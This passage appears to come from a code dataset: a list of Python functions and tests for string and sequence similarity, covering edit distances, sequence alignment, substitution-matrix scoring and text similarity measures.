This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw", "def substitution_score(substitution_matrix, seqA, seqB):\n return sum(compute_score_by_position(substitution_matrix, seqA, seqB))", "def compute_similarity(self, seq_node, **kwargs):\n pass", "def matrix_score(sequence1: str, sequence2: str, matrix_str: str = BLOSUM62) -> int:\r\n score_matrix = _load_matrix(matrix_str)\r\n score = 0\r\n for amino1, amino2 in zip(sequence1, sequence2):\r\n try:\r\n current_score = score_matrix[amino1.upper()][amino2.upper()]\r\n score += current_score\r\n print(f'{amino1} <-> {amino2}: {current_score}')\r\n except KeyError:\r\n raise AminoAcidNotFoundError(f'Scoring matrix does not support scoring for: (\\'{amino1}\\', \\'{amino2}\\')')\r\n return score", "def lev_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity measure\n return measure.get_sim_score(s1, s2)", "def semantic_similarity(self,sentence_1, sentence_2, info_content_norm):\n\t words_1 = sentence_1.getList_of_words()\n\t words_2 = sentence_2.getList_of_words()\n\t joint_words = set(words_1).union(set(words_2))\n\t vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)\n\t vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)\n\t return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))", "def test_sequence_dist_all_metrics(metric):\n unique_seqs = np.array([\"AAA\", \"ARA\", \"AFFFFFA\", \"FAFAFA\", \"FFF\"])\n seqs2 = np.array([\"RRR\", \"FAFA\", \"WWWWWWW\"])\n dist_mat = ir.ir_dist.sequence_dist(unique_seqs, metric=metric, cutoff=8, n_jobs=2)\n assert dist_mat.shape == (5, 5)\n\n dist_mat = ir.ir_dist.sequence_dist(\n unique_seqs, seqs2, metric=metric, cutoff=8, n_jobs=2\n )\n assert dist_mat.shape == (5, 3)", "def compute_similarity(self, text1, text2):\n\n text1_dist = self.predict(text1)[0]\n text2_dist = self.predict(text2)[0]\n return jensenshannon(text1_dist, text2_dist)", "def sequence(word1: str, word2: str) -> str:\r\n matrix = [[[0, [0, 0]] for x in range(len(word1) + 1)] for i in range(len(word2) + 1)]\r\n\r\n for i in range(1, len(word2) + 1):\r\n for j in range(1, len(word1) + 1):\r\n # compares every letter in\r\n if word2[i - 1] == word1[j - 1]:\r\n matrix[i][j][0] = 1 + matrix[i-1][j-1][0]\r\n matrix[i][j][1] = [i - 1, j - 1]\r\n else:\r\n if matrix[i - 1][j][0] > matrix[i][j - 1][0]:\r\n matrix[i][j][0] = matrix[i - 1][j][0]\r\n matrix[i][j][1] = [i - 1, j]\r\n else:\r\n matrix[i][j][0] = matrix[i][j - 1][0]\r\n matrix[i][j][1] = [i, j - 1]\r\n # the code below runs in order to extract the sequence. 
it starts at position (m,n)\r\n res = \"\"\r\n i = len(matrix) - 1\r\n j = len(matrix[0]) - 1\r\n while i and j != 0:\r\n if matrix[i][j][1] == [i - 1, j - 1]:\r\n res = word1[j - 1] + res\r\n i, j = matrix[i][j][1]\r\n return res", "def information_content_similarity(s1, s2):\n lemmas_sentence_1, tagged_sentence_1 = lemmatize_sentence(s1.lower())\n lemmas_sentence_2, tagged_sentence_2 = lemmatize_sentence(s2.lower())\n\n # Disambiguate words and create list of sysnsets \n synsets_sentence_1 = []\n for (lemma, word_tag) in zip(lemmas_sentence_1, tagged_sentence_1):\n synset = lesk(lemmas_sentence_1, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_1.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_1.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n synsets_sentence_2 = []\n for (lemma, word_tag) in zip(lemmas_sentence_2, tagged_sentence_2):\n synset = lesk(lemmas_sentence_2, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_2.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_2.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n score, count = 0.0, 0\n # For each word in the first sentence\n for synset in synsets_sentence_1:\n L = []\n for ss in synsets_sentence_2:\n try:\n L.append(synset.lin_similarity(ss, brown_ic))\n except:\n continue\n if L: \n best_score = max(L)\n score += best_score\n count += 1\n # Average the values\n if count > 0: score /= count\n return score", "def testSeqMatch(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.seqmatch(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"SeqMatch\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"SeqMatch\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"SeqMatch\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.seqmatch(pair[0],pair[1])\n approx_str_value_2 = stringcmp.seqmatch(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"SeqMatch\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"SeqMatch\" does not return 1.0 if strings are equal: '+ \\\n str(pair)", "def text_similarity(this_text, other_text, shingle_length=5, minhash_size=200, random_seed=5):\n this_shingles = ShingledText(this_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n other_shingles = ShingledText(other_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n return this_shingles.similarity(other_shingles)", "def mm_similarity(s1, s2):\n if filter(str.isalpha, s1) == filter(str.isalpha, s2):\n if len(s1) < len(s2):\n return float(len(s1)) / len(s2)\n else:\n return float(len(s2)) / len(s1)\n else:\n return 0.", "def lemma_similarity(lemmas_sm, lemmas_lg):\n total = 0\n for k, v in lemmas_sm.items():\n if k in lemmas_lg:\n total += v*lemmas_lg[k]\n return 
total", "def similarity(query,word_dict,dictionary,number_of_docs,id):\n similarity = 0.0\n scalar_leng = 0.0\n for term in query:\n if term in dictionary:\n similarity += word_dict[term][1]*imp(term,word_dict,number_of_docs,id)\n\n for term in dictionary:\n scalar_leng += imp(term, word_dict, number_of_docs, id) ** 2\n\n final_scalar_leng = math.sqrt(scalar_leng)\n similarity = similarity / final_scalar_leng\n #print(similarity)\n return similarity", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n score = alignment_matrix[len_x][len_y]\n\n while len_x > 0 and len_y > 0:\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n while len_x > 0:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n\n while len_y > 0:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n return (score, align_x, align_y)", "def simple_baseline_similarity(s1, s2):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n\n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ (word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1 if not tagged_word in stop_words] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2 if not tagged_word in stop_words] # [LEMMA_1, ...]\n \n word_seq_match = difflib.SequenceMatcher(None, tokenized_sentence_1, tokenized_sentence_2)\n word_match = word_seq_match.find_longest_match(0, len(tokenized_sentence_1), 0, len(tokenized_sentence_2))\n\n lemm_seq_match = difflib.SequenceMatcher(None, lemmas_sentence_1, lemmas_sentence_2)\n lemm_match = lemm_seq_match.find_longest_match(0, len(lemmas_sentence_1), 0, len(lemmas_sentence_2))\n\n word_sim = word_match.size/(max(len(tokenized_sentence_1), len(tokenized_sentence_2)) + 0.001)\n lemm_sim = lemm_match.size/(max(len(lemmas_sentence_1), len(lemmas_sentence_2)) + 0.001)\n\n return word_sim, lemm_sim", "def get_similarity(df):\n count = CountVectorizer()\n count_matrix = count.fit_transform(df[\"bag_of_words\"])\n cosine_sim = cosine_similarity(count_matrix, count_matrix)\n return cosine_sim", "def test_similarity_fixed():\n similarity = pm.compute_similarity_for_fixed(\"Rio de Janeiro\", \"São Paulo\")\n nose.tools.eq_(similarity, 0, \"Wrong fixed similarity\")\n similarity = pm.compute_similarity_for_fixed(\"Rio de Janeiro\", \"Rio de Janeiro\")\n nose.tools.eq_(similarity, 1, \"Wrong fixed similarity\")", "def calc_similarity(lhs, rhs):\n lhs_decomp = decompose(lhs)\n rhs_decomp = decompose(rhs)\n dist = editdistance.eval(lhs_decomp, rhs_decomp)\n max_len = max(len(lhs_decomp), len(rhs_decomp))\n sim = float(max_len - dist) / float(max_len)\n logging.debug('SIM: [%s] vs [%s] ==> %d / %d = %f', lhs.encode('UTF-8'), rhs.encode('UTF-8'),\n max_len - dist, 
max_len, sim)\n return sim", "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n #initialization of variables\n x_pos = -1\n y_pos = -1\n result_seq_x = ''\n result_seq_y = ''\n score = 0\n\n #determine start position in alignment_matrix as position with maximum value \n for row in range(len(seq_x) + 1):\n for col in range(len(seq_y) + 1):\n if alignment_matrix[row][col] > score:\n score = alignment_matrix[row][col]\n x_pos = row\n y_pos = col\n\n #start in start position and go upwards till we reach first entry with value 0\n #in every iteration we reconstruct alignments based on value in alignment_matrix and scoring_matrix\n while x_pos != 0 and y_pos !=0:\n current_value = alignment_matrix[x_pos][y_pos]\n if current_value == 0:\n break\n \n if current_value == alignment_matrix[x_pos-1][y_pos-1] + scoring_matrix[seq_x[x_pos-1]][seq_y[y_pos-1]]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n x_pos -= 1\n y_pos -= 1\n elif current_value == alignment_matrix[x_pos-1][y_pos] + scoring_matrix[seq_x[x_pos-1]][\"-\"]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = \"-\" + result_seq_y\n x_pos -= 1\n else: \n result_seq_x = \"-\" + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n y_pos -= 1\n\n return (score,result_seq_x,result_seq_y)", "def apply_similarity(reconstruction, s, A, b):\n # Align points.\n for point in reconstruction.points.values():\n Xp = s * A.dot(point.coordinates) + b\n point.coordinates = Xp.tolist()\n\n # Align cameras.\n for shot in reconstruction.shots.values():\n R = shot.pose.get_rotation_matrix()\n t = np.array(shot.pose.translation)\n Rp = R.dot(A.T)\n tp = -Rp.dot(b) + s * t\n shot.pose.set_rotation_matrix(Rp)\n shot.pose.translation = list(tp)", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def test_dice_similarity_matrix_compiled():\n vectors1 = np.array([[1, 1, 0, 0],\n [0, 0, 1, 1]])\n vectors2 = np.array([[0, 1, 1, 0],\n [1, 0, 1, 1]])\n\n scores = dice_similarity_matrix(vectors1, vectors2)\n expected_scores = np.array([[0.5, 0.4],\n [0.5, 0.8]])\n assert scores == pytest.approx(expected_scores, 1e-7), \"Expected different scores.\"", "def align(src, tgt):\n\n sm = SequenceMatcher(a=list(map(lambda x: x[0], tgt)), b=list(map(lambda x: x[0], src)))\n tgt_temp, src_temp = [], []\n opcodes = sm.get_opcodes()\n for tag, i1, i2, j1, j2 in opcodes:\n # If they are equal, do nothing except lowercase them\n if tag == 'equal':\n for i in range(i1, i2):\n tgt[i][1] = 'e'\n tgt_temp.append(tgt[i])\n for i in range(j1, j2):\n src[i][1] = 'e'\n src_temp.append(src[i])\n # For insertions and deletions, put a filler of '***' on the other one, and\n # make the other all caps\n elif tag == 'delete':\n for i in range(i1, i2):\n tgt[i][1] = 'd'\n tgt_temp.append(tgt[i])\n for i in range(i1, i2):\n src_temp.append(tgt[i])\n elif tag == 'insert':\n for i in range(j1, j2):\n src[i][1] = 'i'\n tgt_temp.append(src[i])\n for i in range(j1, j2):\n src_temp.append(src[i])\n # More complicated logic for a substitution\n elif tag == 'replace':\n for i in range(i1, i2):\n tgt[i][1] = 's'\n for i in range(j1, j2):\n src[i][1] = 's'\n tgt_temp += tgt[i1:i2]\n src_temp += src[j1:j2]\n \n src, tgt = GumarDataset.align_subsequences(src_temp, tgt_temp)\n return src, tgt", "def test_dice_similarity_matrix():\n vectors1 = np.array([[1, 1, 0, 0],\n [0, 0, 1, 1]])\n vectors2 = np.array([[0, 1, 1, 0],\n [1, 0, 1, 1]])\n\n scores = dice_similarity_matrix.py_func(vectors1, vectors2)\n expected_scores = np.array([[0.5, 0.4],\n [0.5, 0.8]])\n assert scores == pytest.approx(expected_scores, 1e-7), \"Expected different scores.\"", "def compute_similarity(im1, im2, test_id):\n\n results = dict()\n results['id'] = test_id\n results['test_im'] = im2\n results['mse_value'], results['mse_map'] = compute_mse(im1, im2)\n results['ssim_value'], results['ssim_map'] = compute_ssim(im1, im2, 5)\n results['cw_ssim_value'], results['cw_ssim_map'] = compute_cw_ssim(im1, im2, 30)\n results['gms_value'], results['gms_map'] = compute_gms(im1, im2)\n results['fsim_value'], results['pc_max_map'] = compute_fsim(im1, im2)\n\n return results", "def get_similarity(string1, string2, probabilities, characters):\n\n strict_counter = 0\n weak_counter = 0\n for i in range(0, len(string1)):\n if string1[i] == string2[i]:\n strict_counter+=1\n\n k = 0\n for prob in probabilities[i]:\n if ((prob != 0) & (string1[i] == characters[k])):\n weak_counter += 1\n break\n \n k+=1\n\n # Return list containing strict and weak probabilities\n return [(strict_counter / len(string1)) * 100, \n (weak_counter / len(string1)) * 100]", "def compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n #score = 
max([alignment_matrix[row][col] for row in range(len_x + 1) for col in range(len_y+1)])\n\n max_score = -1\n max_positions = []\n for row in range(len(seq_x)+1):\n for col in range(len(seq_y)+1):\n if alignment_matrix[row][col] == max_score:\n max_positions.append((row,col))\n if alignment_matrix[row][col] > max_score:\n max_score = alignment_matrix[row][col]\n max_positions = [(row, col)]\n max_row, max_col = random.choice(max_positions)\n\n #print max_score, max_row, max_col\n\n len_x = max_row\n len_y = max_col\n\n while alignment_matrix[len_x][len_y] > 0:\n #print len_x, len_y\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n #while len_x > 0:\n # align_x = seq_x[len_x-1] + align_x\n # align_y = \"-\" + align_y\n # len_x -= 1\n\n #while len_y > 0:\n # align_x = \"-\" + align_x\n # align_y = seq_y[len_y-1] + align_y\n # len_y -= 1\n\n return (max_score, align_x, align_y)", "def compute_global_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n #initialization of start position as bottom-right corner of matrix\n x_pos = len(seq_x)\n y_pos = len(seq_y)\n\n #initialization of variables\n result_seq_x = ''\n result_seq_y = ''\n score = alignment_matrix[x_pos][y_pos]\n\n #start in bottom right corner of matrix and go upwards till we reach left or upper edge\n #in every iteration we reconstruct alignments based on value in alignment_matrix and scoring_matrix\n while x_pos != 0 or y_pos !=0:\n current_value = alignment_matrix[x_pos][y_pos]\n \n if current_value == alignment_matrix[x_pos-1][y_pos-1] + scoring_matrix[seq_x[x_pos-1]][seq_y[y_pos-1]] and x_pos > 0 and y_pos > 0:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n x_pos -= 1\n y_pos -= 1\n elif current_value == alignment_matrix[x_pos-1][y_pos] + scoring_matrix[seq_x[x_pos-1]][\"-\"]:\n result_seq_x = seq_x[x_pos-1] + result_seq_x\n result_seq_y = \"-\" + result_seq_y\n x_pos -= 1\n else: \n result_seq_x = \"-\" + result_seq_x\n result_seq_y = seq_y[y_pos-1] + result_seq_y\n y_pos -= 1\n\n return (score,result_seq_x,result_seq_y)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n num_rows = len(seq_x)\n num_cols = len(seq_y)\n x_prime = ''\n y_prime = ''\n\n while num_rows != 0 and num_cols != 0:\n if alignment_matrix[num_rows][num_cols] == alignment_matrix[num_rows-1][num_cols-1] + scoring_matrix[seq_x[num_rows-1]][seq_y[num_cols-1]]:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_rows -= 1\n num_cols -= 1\n else:\n if alignment_matrix[num_rows][num_cols] == alignment_matrix[num_rows-1][num_cols] + scoring_matrix[seq_x[num_rows-1]]['-']:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = '-' + y_prime\n num_rows -= 1\n else:\n x_prime = '-' + x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_cols -= 1\n \n while num_rows != 0:\n x_prime = seq_x[num_rows-1] + x_prime\n y_prime = '-' + y_prime\n num_rows -= 1\n\n while num_cols != 0:\n x_prime = '-' + 
x_prime\n y_prime = seq_y[num_cols-1] + y_prime\n num_cols -= 1\n\n # compute score of alignment\n score = 0\n for position in range(len(x_prime)):\n score += scoring_matrix[x_prime[position]][y_prime[position]]\n\n return (score, x_prime, y_prime)", "def get_similarity(s1, s2):\n t0 = sorted(list(set(s1.split(' ')).intersection(set(s2.split(' ')))))\n t1 = sorted(list(set(t0 + s1.split(' '))))\n t2 = sorted(list(set(t0 + s2.split(' '))))\n\n r01 = SequenceMatcher(None, t0, t1).ratio()\n r02 = SequenceMatcher(None, t0, t2).ratio()\n r12 = SequenceMatcher(None, t1, t2).ratio()\n return max(r01, r02, r12)", "def findCenterSeq(dictofSeq):\n seqLen = len(dictofSeq)\n pwMatrix = [[\"-\"]*seqLen for i in range(seqLen)]\n listofSeq = []\n for key in dictofSeq:\n listofSeq.append(dictofSeq.get(key))\n \n findMin = []\n acc = 0\n for seq in listofSeq:\n for seq2 in listofSeq:\n # in1 gives row, in2 gives column \n in1 = listofSeq.index(seq)\n in2 = listofSeq.index(seq2)\n pwMatrix[in1][in2] = pairwise(seq, seq2)\n acc += pwMatrix[in1][in2]\n #TypeError: 'int' object is not subscriptable\n findMin.append(acc)\n acc = 0\n posSeq = findMin.index(min(findMin))\n refString = listofSeq[posSeq]\n refName = \"\"\n \n for name, seq in dictofSeq.items():\n if seq == refString:\n refName = name\n \n print(refName)\n \n return refName", "def word_similarity(self):\n y_true = []\n y_pred = []\n for i in open(\"data/word_sim_dataset.txt\").read().split('\\n'):\n i = self.preprocessor(i)\n w1 = i.split()[-1]\n w2 = i.split()[-2] \n st = float(i.split()[-3]) / 4 #dataset has scale from 0 to 4\n \n try:\n w1 = self.embeddings_index[w1] \n w2 = self.embeddings_index[w2] \n w1 = w1 / np.linalg.norm(w1)\n w2 = w2 / np.linalg.norm(w2)\n y_pred.append(np.dot(w1,w2))\n y_true.append(st)\n except:\n pass\n if y_true == []:\n return 1.0\n return mean_squared_error(y_true, y_pred, squared=False)", "def similarity(A: str, B: str, data: dict, Acentered: np.ndarray, pca_of_A: PCA):\r\n # Calculate E(A|B)\r\n A_by_B = pca_of_A_using_B(pca_of_A, Acentered, B, data[B])\r\n A_sqrd = np.power(A_by_B - data[A], 2)\r\n EAB = A_sqrd.mean(axis=0)\r\n\r\n # Calculate E(B|A)\r\n pca_of_B, mean_of_B, B_centered = cache_calcs(B, data[B])\r\n B_by_A = pca_of_A_using_B(pca_of_B, B_centered, A, data[A])\r\n B_sqrd = np.power(B_by_A - data[B], 2)\r\n EBA = B_sqrd.mean(axis=0)\r\n\r\n # Calculate similarity\r\n sim = 1 / 2 * (EAB + EBA)\r\n return sim", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def _calculate_trilinear_similarity(self, context, query, context_max_len, query_max_len,\n w4mlu, bias):\n\n subres0 = nd.tile(self.w4c(context), [1, 1, query_max_len])\n subres1 = nd.tile(nd.transpose(\n self.w4q(query), axes=(0, 2, 1)), [1, context_max_len, 1])\n subres2 = nd.batch_dot(w4mlu * context,\n nd.transpose(query, axes=(0, 2, 1)))\n similarity_mat = subres0 + subres1 + subres2 + bias\n return similarity_mat", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def calculate_similarity(self, tfidf_matrix, test_tfidf):\n\n with open(DATASET.fold_root / 'tags_order.json') as file:\n tags_order = json.load(file)\n\n min_max_scaler = MinMaxScaler()\n\n n_clus = 2\n simis = []\n for test_q in test_tfidf:\n s = cosine_similarity(tfidf_matrix, test_q)\n\n # Sorting and getting indices of sorted similarities\n simi = s.transpose()[0]\n simi_values = np.sort(simi)[::-1][:200]\n simi_indices = simi.argsort()[::-1]\n\n breaks = jenkspy.jenks_breaks(simi_values, n_clus)\n simi_count = len(simi_values[breaks[-2] <= simi_values])\n\n q_tags = [self.train_set[i].tags for i in simi_indices][:simi_count]\n\n tags_votes = Counter(chain(*q_tags))\n all_count = sum(tags_votes.values())\n tags_likelihood = [tags_votes.get(\n tag, 0) / all_count for tag in tags_order]\n\n lh = np.array([float(x)\n for x in tags_likelihood]).reshape(-1, 1)\n normalized_lh = np.concatenate(\n min_max_scaler.fit_transform(lh)\n ).tolist()\n\n simis.append(normalized_lh)\n\n return simis", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def match_word_sorted(code1, code2):\n list1 = code1.split(\" \")\n list2 = code2.split(\" \")\n set1 = set(list1)\n set2 = set(list2)\n common_words = set1 & set2\n try:\n common_words.remove(\"\")\n except:\n pass\n\n words_to_index = {}\n for word in common_words:\n in1 = list1.index(word)\n in2 = list2.index(word)\n words_to_index[word] = (in1, in2)\n sorted1 = OrderedDict(sorted(words_to_index.items(), key=lambda t: t[1][0])).keys()\n sorted2 = OrderedDict(sorted(words_to_index.items(), key=lambda t: t[1][1])).keys()\n\n a = Sequence(sorted1)\n b = Sequence(sorted2)\n v = Vocabulary()\n a_encoded = v.encodeSequence(a)\n b_encoded = v.encodeSequence(b)\n scoring = SimpleScoring(MATCH_SCORE, MISMATCH_SCORE)\n aligner = GlobalSequenceAligner(scoring, GAP_SCORE)\n score, encoders = aligner.align(a_encoded, b_encoded, backtrace=True)\n max_score = 0\n for i, encoded in enumerate(encoders):\n alignment = v.decodeSequenceAlignment(encoded)\n if alignment.score > max_score:\n max_score = alignment.score\n return max_score", "def string_match_ratio(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.ratio()", "def gram_schmidt(mat_a):\n # NOTE: We will use the same variable names as the one in the\n # pseudo code for clarity\n rows_count = mat_a.shape[0]\n\n u = mat_a.copy()\n r = np.zeros_like(u)\n q = np.zeros_like(u)\n for i in range(rows_count):\n u_i = u[:, 